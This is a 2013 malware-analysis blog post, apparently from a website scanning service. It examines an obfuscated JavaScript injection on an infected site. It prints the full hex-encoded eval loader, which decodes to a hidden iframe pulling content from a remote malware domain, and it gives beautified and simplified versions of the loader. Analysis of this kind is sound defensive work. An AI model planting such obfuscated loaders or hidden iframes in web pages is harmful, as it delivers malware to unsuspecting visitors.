Wednesday, April 17, 2013

Malicious JavaScript injection

Obfuscated malicious JavaScript code injection generates hidden iframe which loads content from malicious website

Background


Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe that is invisible to the website visitor. Once website URL is accessed by user's browser it downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Mon Apr 15 02:32:41 2013
Infected website's files: 5
Website malware scan report link: http://goo.gl/sHDlV



Website malware scanner report


Malicious JavaScript injection detected




Threat dump: [[<script type='text/javascript' language='javascript' >
                                                                                                                                                                                                                                                          e=eval;
v="0x";
a=0;
try
{
a%26=2
}
catch(q)
{
a=1
}
if(!a)
{
try
{
document.body^=~1;
}
catch(q)
{
a2="!"
}
z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!70!7d!72!79!75!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!70!7d!72!79!75!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!69!66!75!7d!74!73!7a!76!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42!25!2c!66!67!78!74!71!7a!79!6a!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!67!74!77!69!6a!77!25!42!25!2c!35!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!6d!6a!6e!6c!6d!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!7c!6e!69!79!6d!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!71!6a!6b!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!79!74!75!25!42!25!2c!36!75!7d!2c!40!12!f!12!f!25!25!25!25!6e!6b!25!2d!26!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!70!7d!72!79!75!2c!2e!2e!25!80!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!7c!77!6e!79!6a!2d!2c!41!69!6e!7b!25!6e!69!42!61!2c!70!7d!72!79!75!61!2c!43!41!34!69!6e!7b!43!2c!2e!40!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!70!7d!72!79!75!2c!2e!33!66!75!75!6a!73!69!48!6d!6e!71!69!2d!70!7d!72!79!75!2e!40!12!f!25!25!25!25!82!12!f!82!2e!2d!2e!40".split(a2);
s="";
for(i=0;
i<z.length;
i++)
{
s+=String.fromCharCode(e(v+(z[i]))-5);
}
zaz=s;
e(zaz);
}

 </script>]]


Malware entry


Malware entry details.

Beautified script


  1. = eval;
  2. = "0x";
  3. = 0;
  4. try {
  5.     a &= 2
  6. } catch (q) {
  7.     a = 1
  8. }
  9. if (!a) {
  10.     try {
  11.         document.body ^= ~1;
  12.     } catch (q) {
  13.         a2 = "!"
  14.     }
  15.     z="2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25!25!25!7b!66!77!25!70!7d!72!79!75!25!42!25!69!74!68!7a!72!6a!73!79!33!68!77!6a!66!79!6a!4a!71!6a!72!6a!73!79!2d!2c!6e!6b!77!66!72!6a!2c!2e!40!12!f!12!f!25!25!25!25!70!7d!72!79!75!33!78!77!68!25!42!25!2c!6d!79!79!75!3f!34!34!69!66!75!7d!74!73!7a!76!33!77!7a!34!68!74!7a!73!79!36!3a!33!75!6d!75!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!75!74!78!6e!79!6e!74!73!25!42!25!2c!66!67!78!74!71!7a!79!6a!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!67!74!77!69!6a!77!25!42!25!2c!35!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!6d!6a!6e!6c!6d!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!7c!6e!69!79!6d!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!71!6a!6b!79!25!42!25!2c!36!75!7d!2c!40!12!f!25!25!25!25!70!7d!72!79!75!33!78!79!7e!71!6a!33!79!74!75!25!42!25!2c!36!75!7d!2c!40!12!f!12!f!25!25!25!25!6e!6b!25!2d!26!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!70!7d!72!79!75!2c!2e!2e!25!80!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!7c!77!6e!79!6a!2d!2c!41!69!6e!7b!25!6e!69!42!61!2c!70!7d!72!79!75!61!2c!43!41!34!69!6e!7b!43!2c!2e!40!12!f!25!25!25!25!25!25!25!25!69!74!68!7a!72!6a!73!79!33!6c!6a!79!4a!71!6a!72!6a!73!79!47!7e!4e!69!2d!2c!70!7d!72!79!75!2c!2e!33!66!75!75!6a!73!69!48!6d!6e!71!69!2d!70!7d!72!79!75!2e!40!12!f!25!25!25!25!82!12!f!82!2e!2d!2e!40".split(a2);
  16.     s = "";
  17.     for (= 0; i < z.length; i++) {
  18.         s += String.fromCharCode(e(+ (z[i])) - 5);
  19.     }
  20.     zaz = s;
  21.     e(zaz);
  22. }



Simplified version of the malicious injection


  1. <script>
  2.  z = "2d!6b!7a!73!68!79!6e!74!73!25!2d!2e!25!80!12!f!25!25! .... 12!f!82!2e!2d!2e!40".split("!");
  3.  s = "";
  4.  for (= 0; i < z.length; i++) { s += String.fromCharCode(eval("0x" + (z[i])) - 5);}
  5.  eval(s);
  6. </script>



Malicious payload


Decoded payload generates hidden iframe to http://dapxonuq[.]ru/count15.php


Blacklisting status


The website is Suspicious on Google Safe Browsing. Malware is hosted on the domain targeted by the payload.

Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.